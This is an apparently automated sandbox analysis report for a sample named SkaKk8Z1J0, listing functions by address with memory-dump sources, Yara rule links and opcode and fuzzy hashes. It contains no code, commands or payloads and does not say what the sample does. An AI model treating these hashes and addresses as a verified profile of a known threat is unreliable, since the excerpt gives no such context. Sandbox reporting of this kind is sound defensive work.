                                                                                                                                                                                                                                                  Function 00766739 Relevance: 1.3, Strings: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: dB
                                                                                                                                                                                                                                                  • API String ID: 0-2104629891
                                                                                                                                                                                                                                                  • Opcode ID: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
                                                                                                                                                                                                                                                  • Instruction ID: 88d28f4539103711ef6104adbc4c901a24cbbd6804f5379e7088d630b29811a1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5DA00129A9E6548AD2119F4494927F0F778E31770AF1438289904AB153D196E950864C
                                                                                                                                                                                                                                                  Function 004143C2 Relevance: .8, Instructions: 805COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7351b713fdd79e4b11a44c2f3e170ae42ed99a1303c69a2fe6fdb41bd9a8d7aa
                                                                                                                                                                                                                                                  • Instruction ID: d6216dced0a3b9436857ee0068e0dff51503e5ecb223af83f8720e1cf69b390d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7351b713fdd79e4b11a44c2f3e170ae42ed99a1303c69a2fe6fdb41bd9a8d7aa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F02242B56082009FE7149F24EC41B6B73A2FBDB300F55893EF6C487292DA799C41CB4A
                                                                                                                                                                                                                                                  Function 00416BA5 Relevance: .7, Instructions: 688COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 5a7678f017f308848797c1ab2fc33ccddf339249d7514e43f7e0819896a5eda0
                                                                                                                                                                                                                                                  • Instruction ID: 9c79f7e63c480dd40f7a7ccc60d41b21814d9940eb0dc65dd07d8a453e372cf2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a7678f017f308848797c1ab2fc33ccddf339249d7514e43f7e0819896a5eda0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16120E35204B018FD325CF29C8907A3BBE2EF9A314F19866DD4DA8B795D738E846CB54
                                                                                                                                                                                                                                                  Function 00743207 Relevance: .7, Instructions: 670COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                                                                                                                                                                                                                  • Instruction ID: b22232985e0127392249fb1de7997b5cabf4f2c6137ecea2acadcc538c64b6f3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F552C2715083458FCB15CF29C0906AABBE1FF88318F19866DF89D5B342D778EA49CB85
                                                                                                                                                                                                                                                  Function 00402FA0 Relevance: .7, Instructions: 670COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                                                                                                                                                                                                                  • Instruction ID: b7901f3288d9e4572b9bc57ce4c79cacd886df45a950704f10474c7163005246
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE52F4715083458FCB14CF18C0806AABFE1BF89315F18867EF8996B391D778EA49CB85
                                                                                                                                                                                                                                                  Function 00746947 Relevance: .7, Instructions: 665COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: f260d4ba8b532cff43b70e0305cc444787dac05339277c8b44483d328b2ca1f5
                                                                                                                                                                                                                                                  • Instruction ID: ef9fe9b72451da1a73a5cbd741be047fc3c5a287ae1af2da4f08c26152151171
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f260d4ba8b532cff43b70e0305cc444787dac05339277c8b44483d328b2ca1f5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5852C9B0A087848FE735CF24C4843A7BBE1FB52314F14496ED5E646AC2D37DA989CB16
                                                                                                                                                                                                                                                  Function 004066E0 Relevance: .7, Instructions: 665COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7b0d0db576f8f4a099c36225a03624d7682871d61e803cbbd0c0fa625a463efe
                                                                                                                                                                                                                                                  • Instruction ID: f9402e00db0146810cf529bce4eeb96ef771652ee20e7226bad8efb3fef3d353
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b0d0db576f8f4a099c36225a03624d7682871d61e803cbbd0c0fa625a463efe
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA52C7B0A08B848FE735CB24C4843A7BBE1AB51314F15893FD5E716BC2C27DA995C71A
                                                                                                                                                                                                                                                  Function 0075F347 Relevance: .6, Instructions: 640COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 384453c34c44fa10a221719aff1fe9f2af50c5f2060accd689493d508a0f7137
                                                                                                                                                                                                                                                  • Instruction ID: 2a598fa82fdb6f398db0d6f2a523da9205ae99bce6da1b2801a173677c564644
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 384453c34c44fa10a221719aff1fe9f2af50c5f2060accd689493d508a0f7137
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7626CB0608B818ED325CF3C8855797BFE5AB5A314F048A5DE0EE873D2C7B96405CB66
                                                                                                                                                                                                                                                  Function 0041F0E0 Relevance: .6, Instructions: 640COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 384453c34c44fa10a221719aff1fe9f2af50c5f2060accd689493d508a0f7137
                                                                                                                                                                                                                                                  • Instruction ID: d272bb6b5d6e2c7a5f0cafe8b1d1f27913d4ef5c9ad92f98558892845c7f91e7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 384453c34c44fa10a221719aff1fe9f2af50c5f2060accd689493d508a0f7137
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5625CB0608B818ED325CF3C8855797BFE5AB5A314F048A5DE0EE873D2C7B96405CB66
                                                                                                                                                                                                                                                  Function 00743C27 Relevance: .6, Instructions: 600COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 678ad88440436fc2347c77ec1617077ed1d00620730d0d2d7e6321ebe71b5d32
                                                                                                                                                                                                                                                  • Instruction ID: 57395e9414c3dc634adfd571e915f31d401b7048b7fccc7764a6e5707ffd0ba9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 678ad88440436fc2347c77ec1617077ed1d00620730d0d2d7e6321ebe71b5d32
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0322370A15B118FC368CF29C58062ABBF1BF55710B604A2ED6AB87F90D73AF945DB10
                                                                                                                                                                                                                                                  Function 00747717 Relevance: .6, Instructions: 595COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d94ed56ffcdc38c94b90bd9783928bf4a55e001c4d3c4371622baab0c0238d3b
                                                                                                                                                                                                                                                  • Instruction ID: 93fadb8327828d4bbb989a5d666e55c9ea96ec13170b27fb9e0fe49c1936aceb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d94ed56ffcdc38c94b90bd9783928bf4a55e001c4d3c4371622baab0c0238d3b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B02F932A0C7518BC728DF18D88167FB3E6FFD4305F19892DD98687285E738A905CB86
                                                                                                                                                                                                                                                  Function 004074B0 Relevance: .6, Instructions: 595COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d94ed56ffcdc38c94b90bd9783928bf4a55e001c4d3c4371622baab0c0238d3b
                                                                                                                                                                                                                                                  • Instruction ID: 1131e2afb1b9b7a06d06e0851762e967182e12a53f43e8bd2da4f6050e1e8ff1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d94ed56ffcdc38c94b90bd9783928bf4a55e001c4d3c4371622baab0c0238d3b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C802C732A0C7118BC724DE18D8816ABB3E2EBD4345F19893ED586A73C5D738B815CB4B
                                                                                                                                                                                                                                                  Function 004180A9 Relevance: .4, Instructions: 449COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                  • Opcode ID: b9cd94a92c7e0d93f0c1db0f6149aa8383bb4963fce823e7fd41077e0e8b1306
                                                                                                                                                                                                                                                  • Instruction ID: 6564eefc0a79269b3db00a3a3e2fdb8cf1d61b2510fe7412d98733e2447c0821
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b9cd94a92c7e0d93f0c1db0f6149aa8383bb4963fce823e7fd41077e0e8b1306
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CC128342047418FD7258F28C890AA7BBE1FF9B310F58896ED4D6477A2CB75E846CB58
                                                                                                                                                                                                                                                  Function 0043C280 Relevance: .4, Instructions: 422COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7dd1dd3bcd13b84c911ff83a91c1cc82912ef431115ec00b7fd8cedab479074d
                                                                                                                                                                                                                                                  • Instruction ID: 2610ce8d2ada8b42ce1f8a49459609e4fff09a6b757421d9f45879ca41997f09
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7dd1dd3bcd13b84c911ff83a91c1cc82912ef431115ec00b7fd8cedab479074d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8D10E36A187508FC704CF28D8D162AB7E2BBCE314F09897DE98687396D738D905CB46
                                                                                                                                                                                                                                                  Function 0043C1F0 Relevance: .4, Instructions: 406COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3d103255a358cbf0f4493334fed60bd47c6ce4713af475a6909a9917db2fa4dc
                                                                                                                                                                                                                                                  • Instruction ID: b593eabd3734573ca464a0f0c89662c3852b345cc910da406a972fedca83911a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d103255a358cbf0f4493334fed60bd47c6ce4713af475a6909a9917db2fa4dc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CDC1ED3AA18611CFC704CF28D8D066AB7E2FB8E315F19887DE98687352D738D945CB46
                                                                                                                                                                                                                                                  Function 00745C57 Relevance: .4, Instructions: 400COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 9f2680bab9b6854d00e0753734e73372bb980c2eb61b62fe20cb4c3e0bac24b1
                                                                                                                                                                                                                                                  • Instruction ID: fc4101c95a3ca4d6829d4ac5017e182b8b3fc2702c02ac5c7193cf134c728008
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f2680bab9b6854d00e0753734e73372bb980c2eb61b62fe20cb4c3e0bac24b1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56E17871108785CFC720DF29C880A2BBBE5EF99300F44892DE5D987752E379E949CB96
                                                                                                                                                                                                                                                  Function 004059F0 Relevance: .4, Instructions: 400COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2e3d702f462c947c04f76d2767d49a70cc8d8a13f72f5fef100d598c3194e41d
                                                                                                                                                                                                                                                  • Instruction ID: 93b8c5387be001e94cab0129f885dbabef0bc68014b552001e05b684e15851e5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e3d702f462c947c04f76d2767d49a70cc8d8a13f72f5fef100d598c3194e41d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48E19A712087418FD720DF29C880A6BBBE1EF99304F44882EE4D597792E379E944CB96
                                                                                                                                                                                                                                                  Function 004166A0 Relevance: .4, Instructions: 377COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
                                                                                                                                                                                                                                                  • Instruction ID: 32691a19542b475e5b32abf01bf61a59727b98503660fe5e1cf9ea7214f750c2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FBC1CEB4600302CFD7248F25C8917A2BBB1FF46314F1986ADD4964F792E778E885CB95
                                                                                                                                                                                                                                                  Function 00428BC0 Relevance: .4, Instructions: 370COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 388e2b6d0a182aa95bd5de263f76d1b454a1f9af5a69695319d1fde35becd882
                                                                                                                                                                                                                                                  • Instruction ID: f9929a72ce68a40c3f81f5f1acad1d241ce5af9a0f8176ac8c595b8a2b44423d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 388e2b6d0a182aa95bd5de263f76d1b454a1f9af5a69695319d1fde35becd882
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EDD15535B05255CFDB14CFB8E8816AEBBB2AF1A300F58417DE551A7392CB388E05CB59
                                                                                                                                                                                                                                                  Function 00759541 Relevance: .4, Instructions: 362COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 0a6ff38b7f88a38b39f0feb0216d1201f336bfe1d4496b7dedc26c113c3b1706
                                                                                                                                                                                                                                                  • Instruction ID: 2f90d5cc1f3ac659b439a16e44335fe424bec510cdc47ea627444c72a47db9bf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a6ff38b7f88a38b39f0feb0216d1201f336bfe1d4496b7dedc26c113c3b1706
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BA13870201741CFD729CF38C8659A677F2EF8A311719869CD9A28F7A5EB78E805CB50
                                                                                                                                                                                                                                                  Function 004192DA Relevance: .4, Instructions: 362COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 07b520a97f650d78ec3e4206198fbb7b152170e0c1bb9b71eb1cf8cd26d43cec
                                                                                                                                                                                                                                                  • Instruction ID: c7afa36b394fec79d3864c076b52a9d2828a05187d2106694a5d2b7072183649
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07b520a97f650d78ec3e4206198fbb7b152170e0c1bb9b71eb1cf8cd26d43cec
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30A11571205701CFD329CF28C4A19A777E2FF8A310719869DD4A68B3A5EB38AC41CB54
                                                                                                                                                                                                                                                  Function 00749967 Relevance: .4, Instructions: 351COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
